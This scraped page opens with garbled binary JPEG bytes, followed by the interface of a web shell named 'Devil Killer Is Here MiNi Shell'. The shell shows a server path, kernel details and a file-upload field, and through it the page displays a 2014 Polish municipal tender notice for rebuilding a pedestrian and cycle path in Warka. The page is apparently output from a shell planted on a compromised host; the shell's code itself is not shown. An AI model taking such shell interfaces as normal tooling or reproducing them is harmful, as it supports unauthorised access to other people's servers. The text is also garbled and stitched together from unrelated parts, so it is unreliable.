JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140806/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140806/170017-N-2014.html

<p class="kh_header"><b>Warka: Przebudowa ciągu pieszo-rowerowego położonego pomiędzy ul. Polną 
a ul. Wysockiego w Warce</b><br>
<b>Numer ogłoszenia: 170017 - 2014; data zamieszczenia: 06.08.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Warka , Plac St. Czarnieckiego 1, 05-660 Warka, woj. mazowieckie, tel. 048 665 12 00, faks 048 665 12 25.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.warka.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa ciągu pieszo-rowerowego położonego pomiędzy ul. Polną 
a ul. Wysockiego w Warce.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest Przebudowa ciągu pieszo- rowerowego położonego pomiędzy ul. Polną a ul. Wysockiego wraz z przebudową oświetlenia ulicznego w Warce. 
Na przedmiotowym terenie znajduje się chodnik o nawierzchni z płyt betonowych, obramowany obrzeżami betonowymi. Jest to działka bezpośrednio przyległa do terenu szkoły (ogrodzenie na podmurówce). Wzdłuż chodnika znajdują się słupy betonowe z latarniami.
Materiały z rozbiórki nadające się do ponownego wbudowania należy protokolarnie przekazać do Zakładu Usług Komunalnych przy udziale Inspektora Nadzoru Inwestorskiego bądź innego przedstawiciela Zamawiającego.
         Projektowany ciąg pieszo- rowerowy włączony będzie do ścieżki rowerowej i chodnika w ulicy Polnej w km 0+002,90 a koniec na krawędzi  chodnika w ulicy Wysockiego w km 0+204,94.                                                                                                                              Szerokość ciągu pieszo- rowerowego 3,50m, w tym chodnik szerokości 1,50 m i ścieżka rowerowa szerokość 2,0m. Nawierzchnia z betonowej kostki brukowej grubość 8 cm na podsypce cementowo- piaskowej 1: 4 grubości 4 cm .  Na chodniku kostka fazowana  koloru szarego, na ścieżce rowerowej kostka bezfazowa koloru czerwonego. Podbudowa powinna być wykonana z kruszywa łamanego frakcji 0/31,5 mm, grubość warstwy 10 cm, warstwa odsączająca z piasku średnioziarnistego, grubość warstwy 10 cm . Obramowanie obrzeżami betonowymi o wymiarach 8x30x100 cm na ławie betonowej z oporem C12/15 (F=0,00175m2). Przy chodniku zaprojektowano  4 szt. wnęk (wymiary 2,50x1,0) w celu ustawienia ławek i koszy na śmieci.                                                                
Wykonanie odwodnienia ciągu pieszo- rowerowego będzie polegało na budowie ścieku liniowego długości 4,0 m, betonowej studzienki rewizyjnej osadnikowej średnicy 1000 mm oraz budowie przykanalików z rur PVC średnicy 200 mm z podłączeniem do studni rewizyjnej kanalizacji odwodnienia terenu szkoły ( działka nr ewid. 2002/5). Na ulicy Polnej konieczna jest przebudowa (poszerzenie w kierunku zachodnim) istniejącego wyniesionego przejścia dla pieszych w celu poszerzenia o przejście dla rowerów. Odwodnienie ciągu pieszo- rowerowego powierzchniowo w kierunku  ulicy Polnej. Bezpośrednio przed ulicą Polną zaprojektowano ściek liniowy z odprowadzeniem wód do kanalizacji deszczowej w ulicy Polnej.                                                                                                                         
Zmiana oświetlenia z napowietrznego na kablowe polegać będzie na wprowadzeniu linii kablowej YAKXs 4x35 mm2  z istniejącego słupa nr 6 linii niskiego napięcia ze stacji transformatorowej Warka Wysockiego i zasilić projektowane oświetlenie uliczne ciągu pieszo- rowerowego.  Łączna długość linii oświetleniowej wraz z zapasami kabla wynosi 252 m. Ustawić w projektowanych lokalizacjach 7 sztuk stylowych stalowych słupów oświetleniowych o wysokości h=7,0 m wraz z wysięgnikiem pojedynczym i oprawą. Zaprojektowane słupy i oprawy stanowią kontynuację wybudowanego oświetlenia na ul. Polnej pod względem estetyki oraz utrzymania oświetlenia. Wszystkie prace powinny być wykonane zgodnie z warunkami przyłączenia do sieci dystrybucyjnej. Po wykonaniu słupy oznakować numerem zgodnie z projektem. Sposób graficzny uzgodnić z Zamawiającym.
Obecnie chodnik pomiędzy ul. Polną i ul. Wysockiego oświetlony jest oprawami sodowymi na słupach żelbetowych ZN-10, zasilanych linią napowietrzną AsXSn 2x25 mm2.  Z uwagi na budowę ścieżki rowerowej należy zdemontować cztery oprawy sodowe ze słupów linii napowietrznej, zdemontować słupy oświetleniowe - dwa słupy rozkraczne, dwa słupy przelotowe oraz napowietrzną linię oświetleniową.   
Do obowiązków wyłonionego w przetargu Wykonawcy należeć będzie rozłączenie linii napowietrznej skierowanej do słupa rozkracznego znajdującego się na działce o nr ewid. 2002/5. Odłączony kabel należy odpowiednio zabezpieczyć, tak aby nie stanowił zagrożenia dla przebywających na tym terenie uczniów Publicznej Szkoły Podstawowej Nr 2 z Oddziałami Integracyjnymi w Warce, jak również innych osób, które będą się poruszały po tym terenie.                                                                                                                       
Konieczne jest również wprowadzenie oznakowania pionowego, które ma za zadanie uporządkowanie ruchu na ciągu pieszo-rowerowym jednośladów i ruchu pieszego oraz wyznaczenie bezpiecznych stref poruszania się. Natomiast oznakowanie poziome wiąże się z wymalowaniem przejścia dla pieszych  i przejazdu dla rowerów na progu zwalniającym oraz oznakowanie samego progu zwalniającego ( znaki P-10, P-11, P25). Na ciągu pieszo- rowerowym wyznaczono przebieg trasy dla rowerów innym kolorem kostki brukowej a kierunki poruszania się rowerów znakami P-23. Wymiary oznakowania poziomego określone w ustawie. (Dziennik Ustaw Rzeczypospolitej Polskiej załącznik do numeru 220, z dnia 23 grudnia 2003r. poz. 2181).
Do obowiązków Wykonawcy należeć będzie wykonanie według projektu stałej organizacji ruchu oraz jej wprowadzenie ( w tym zawiadomienia odpowiednich organów o zamiarze wprowadzenia stałej organizacji ruchu).
     Zarówno na ulicy Polnej  jak i Wysockiego obowiązuje ograniczenie tonażowe do 3,5t (znak 
B-5). Wykonawca ma obowiązek dostosować środki transportu do przedmiotowego ograniczenia tonażowego. Jednak w przypadku zniszczeń dokonanych podczas realizacji  zadania nowych elementów ul. Polnej lub ulicy Wysockiego do obowiązków Wykonawcy należeć będzie bezwzględne odtworzenie z takich samych nieuszkodzonych (nowych) prefabrykatów wg dyspozycji przedstawiciela Zamawiającego lub Inspektora Nadzoru Inwestorskiego.
        Wszystkie prace powinny być wykonane i ukończone zgodnie z obowiązującym prawem obowiązującym w Rzeczpospolitej Polskiej , w szczególności: Warunkami technicznymi wykonania i odbioru robót budowlanych , Prawem Budowlanych , Prawem ochrony środowiska, Prawem o ruchu drogowym, Ustawą o drogach publicznych , ustawą o odpadach, ustawą o badaniach i certyfikatach, Prawem zamówień publicznych i aktami wykonawczymi do w/w oraz wymaganiami Zamawiającego zawartymi w SIWZ i wiedzą techniczną.
        Zamawiający ustala ryczałtowy system wynagrodzenia. Wykonawca powinien przewidzieć wszystkie okoliczności, które mogą wpłynąć na ocenę oferty. Podstawę do określenia całkowitej ryczałtowej ceny stanowi zakres robót budowlanych określony w dokumentacji projektowej oraz zakres prac w SIWZ, realizowanych zgodnie ze sztuką budowlaną i przepisami ustawy prawo budowlane oraz Specyfikacjami Technicznymi Wykonania i Odbioru Robót.
Wykonawca winien sporządzić kosztorys ofertowy na podstawie załączonego przedmiaru robót. Przedmiar ma charakter informacyjno- pomocniczy. Załączony przez oferenta kosztorys ofertowy ze względu na ryczałtowy sposób wynagrodzenia będzie miał również charakter informacyjno- pomocniczy. Wyłonionego w przetargu Wykonawcę obowiązuje wykonanie zamówienia zgodnie z dokumentacją projektową , SIWZ, STWiOR i wiedzą techniczną.                            
Zamawiający nie będzie badał zgodności podstaw wyceny, ani ilości robót w złożonych przez oferentów kosztorysach ofertowych. Cena określona w ofercie musi zawierać wszystkie koszty związane z realizacją wg dokumentacji projektowej, SIWZ, STWiOR jak również pominięte w dokumentacji projektowej a niezbędne do wykonania zadania, wraz z wszelkimi kosztami towarzyszącymi jak ubezpieczenie budowy, obsługa geodezyjna i inwentaryzacja powykonawcza,, czasowa organizacja ruchu, zajęcie pasa drogowego, media, odtworzenie nawierzchni trasy itd..
          Wszelkie odstępstwa od dokumentacji projektowej w trakcie realizacji robót muszą być uzgadniane z Zamawiającym i Projektantem przed ich wykonaniem.
          Urządzenia i materiały równoważne- jeśli gdziekolwiek w SIWZ przedmiot zamówienia określony został przez wskazanie znaków towarowych lub pochodzenie materiałów, to Zamawiający dopuszcza możliwość zastosowania rozwiązań/urządzeń równoważnych, technologicznych i jakościowych. Przez pojęcie materiałów równoważnych należy rozumieć materiały/urządzenia  gwarantujące realizację robót zgodnie z wydanym pozwoleniem na budowę oraz zapewniające uzyskanie parametrów technicznych nie gorszych od założonych w dokumentacji projektowej, specyfikacjach technicznych wykonania i odbioru robót oraz w przedmiarach robót.
Wykaz  zastosowanych i przyjętych przez Wykonawcę do wyceny materiałów lub urządzeń równoważnych musi zostać załączony do oferty. Koniecznym jest podanie nazwy producenta, precyzyjnego i jednoznacznego typu urządzenia oraz załączenie niezbędnych dokumentów takich jak: atest PZH, deklaracja zgodności producenta/ aprobata techniczna, karta katalogowa producenta zawierająca wszystkie parametry techniczno- eksploatacyjne ujęte w dokumentacji projektowej. Zgodnie z zapisami art. 30 ust. 5 ustawy Prawo zamówień publicznych Wykonawca, który powołuje się na rozwiązania równoważne opisane przez zamawiającego, jest obowiązany wykazać, że oferowane  przez niego roboty budowlane i związane z tym usługi i dostawy spełniają wymagania określone przez Zamawiającego. W związku z powyższym w celu oceny technicznej wszyscy oferenci są zobowiązani załączyć do oferty karty katalogowe. Zamawiający nie wyraża zgody, by proponowane w ofercie rozwiązania równoważne były prototypami.                                                                                                                              Wymogiem bezwzględnym jest, by były to rozwiązania sprawdzone. Wykonawca winien udokumentować, iż zaproponowane urządzenia i materiały równoważne pracują na innych zrealizowanych obiektach przez okres nie krótszy niż 2 lata (na dowód pracy urządzeń/ materiałów  równoważnych należy załączyć np. referencje, protokoły odbioru,  faktury, itp. potwierdzone za zgodność z oryginałem, potwierdzające datę uruchomienia oraz dokument potwierdzający należytą ich pracę w tym okresie- referencje, opinie, itp.).
             Przed podpisaniem umowy wyłoniony Wykonawca zobowiązany jest do przekazania stosownych dokumentów, tj.: oświadczenia kierownika budowy, uprawnienia i izby (w dwóch egzemplarzach) potwierdzonych za zgodność z oryginałem .
Materiały i urządzenia przeznaczone do realizacji w/w zadania należy zaprezentować przedstawicielowi Zamawiającego do akceptacji przed wbudowaniem.    
Wykonawca zobowiązany będzie do wykonania przedmiotu umowy w sposób sprawny i zorganizowany z uwagi na bezpośrednie sąsiedztwo obiektu szkoły i charakter inwestycji - dojście do szkoły. Na czas robót teren należy oznakować i zabezpieczyć przed dostępem osób postronnych, a w szczególności dzieci. Wykonawca odpowiada za oznakowanie i utrzymanie go w należytym stanie.  
  
Ponadto szczegółowy opis obowiązków Wykonawcy zawarty jest we wzorze umowy.

Szczegółowy zakres przedmiotu zamówienia określa dokumentacja projektowa - załącznik nr 8, specyfikacje techniczne wykonania i odbioru robót budowlanych - załącznik nr 9  oraz przedmiary robót - załącznik nr 10 do SIWZ.
 
Szczegółowy opis przedmiotu zamówienia zawarty jest w SIWZ na stronie internetowej www.warka.pl/zp.</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje zamówienia uzupełniające, o których mowa w art. 67 ust.1 pkt. 6 ustawy Pzp do 50% wartości zamówienia</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.11.10.00-8, 45.11.12.00-0, 45.11.13.00-1, 45.23.30.00-9, 45.23.24.10-9, 45.23.31.20-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.10.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia tego warunku zostanie dokonana na podstawie złożonego wymaganego dokumentu określonego w p. punkcie III.4.2) uprawniającego do prowadzenia działalności w zakresie niezbędnym i uprawniającym do realizacji zamówienia - wg kryterium: spełnia, nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien udokumentować posiadanie doświadczenia zawodowego w zakresie robót budowlanych odpowiadających swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia. 
  Wykonawca przedstawi dowody świadczące o tym, że w ciągu ostatnich 5 lat przed upływem  terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał minimum dwie roboty budowlane polegające na budowie lub przebudowie lub remoncie ulicy, chodnika lub ciągu pieszo-rowerowego o nawierzchni z kostki betonowej, których wartość wynosiła co najmniej 100 000,00 zł brutto każda.  
Ocena spełniania tego warunku zostanie dokonana na podstawie złożonych dokumentów wymaganych i określonych w p. punkcie III.4.1  - wg kryterium: spełnia, nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien dysponować osobami odpowiedzialnymi za wykonanie zamówienia lub przedstawić pisemne zobowiązanie innych podmiotów do udostępnienia osób wykwalifikowanych, zdolnych do wykonania zamówienia, posiadających uprawnienia budowlane, upoważniające w świetle obowiązujących przepisów do kierowania i nadzorowania robót w zakresie zamówienia. 
Wymagane osoby to: 
a)	Kierownik Budowy - posiadający następujące kwalifikacje:
- co najmniej 3 lata doświadczenia zawodowego (liczone od dnia uzyskania uprawnień bez ograniczeń) na stanowisku Kierownika Budowy z zakresu budowy dróg oraz robót ziemnych, 
- uprawnienia budowlane bez ograniczeń do kierowania budową i robotami budowlanymi w branży drogowej lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów;
- aktualny wpis na listę członków właściwej izby samorządu zawodowego wydane przez tę izbę,
- wykształcenie wyższe.

b)	Kierownik Robót Elektrycznych - posiadający następujące kwalifikacje: 
- co najmniej 3 lata doświadczenia zawodowego na stanowisku Kierownika Robót Elektrycznych lub kierownika budowy, liczone od dnia uzyskania uprawnień,
- uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów,
- aktualny wpis na listę członków właściwej izby samorządu zawodowego wydane przez tę izbę

c)	Kierownik Robót Instalacji Sanitarnych- posiadający następujące kwalifikacje:
- co najmniej 3 lata doświadczenia zawodowego na stanowisku Kierownika Robót Instalacji Sanitarnych lub kierownika budowy, liczone od dnia uzyskania uprawnień.
- uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń wodociągowych, kanalizacyjnych lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów,
- aktualny wpis na listę członków właściwej izby samorządu zawodowego wydane przez tę izbę.

Ocena spełniania tego warunku zostanie dokonana na podstawie złożonych dokumentów wymaganych i określonych w p. punkcie III.4.1  - wg kryterium: spełnia, nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">określenie robót budowlanych, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o robotach budowlanych niewykonanych lub wykonanych nienależycie<br>Wykonawca przedstawi dowody świadczące o tym, że wykonał minimum dwie roboty budowlane polegające na budowie lub przebudowie lub remoncie ulicy, chodnika lub ciągu pieszo-rowerowego o nawierzchni z kostki betonowej których wartość wynosiła co najmniej 100 000,00 zł każda;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)	Upoważnienie potwierdzające uprawnienie osób podpisujących ofertę (pełnomocnictwo), 
      o ile nie wynika ono z przepisów prawa lub innych dokumentów rejestrowych w 
      oryginale lub kopii poświadczonej przez notariusza.
2)	Oświadczenie o spełnianiu warunków określonych w art. 22. ust.1 ustawy Pzp - wg załącznika nr 2 do SIWZ
3)	Formularz oferty wg wzoru - Załącznik nr 1 do SIWZ.
4)	Kosztorys ofertowy sporządzony na podstawie załączonych przedmiarów (zał. nr 10).
5)	Wykaz rozwiązań równoważnych wg Załącznika nr 6 - w przypadku ich zastosowania.
6)	Dokumenty potwierdzające, że urządzenia równoważne pracują na innych obiektach przez okres nie krótszy niż 2 lata potwierdzone przez Wykonawcę za zgodność z oryginałem (np.: referencje, protokoły odbioru końcowego itp.) - w przypadku zastosowania urządzeń równoważnych w złożonej ofercie.
7)	W przypadku składania oferty przez konsorcjum, niezbędne będzie złożenie pełnomocnictwa w oryginale lub kopii poświadczonej przez notariusza</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość dokonania zmiany postanowień zawartej umowy  w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy w   przypadkach określonych ustawą Pzp oraz zapisami w niniejszej SIWZ i w jej załącznikach w następujących przypadkach:
- przestojów i opóźnień zawinionych przez Zamawiającego,
- działania siły wyższej (np. klęski żywiołowe) mającej bezpośredni wpływ na terminowość wykonania robót lub wystąpienia zdarzenia losowego wywołanego przez czynniki zewnętrzne, którego nie można było przewidzieć z pewnością,  a w szczególności zagrażające bezpośrednio życiu lub zdrowiu ludzi lub grożącego powstaniu szkody w znacznych  rozmiarach,
- z powodu działań osób trzecich uniemożliwiających wykonanie prac, które to działania nie są konsekwencją winy którejkolwiek ze stron,
- z powodu istotnych braków lub błędów w dokumentacji projektowej, również tych polegających na niezgodności dokumentacji z przepisami prawa,
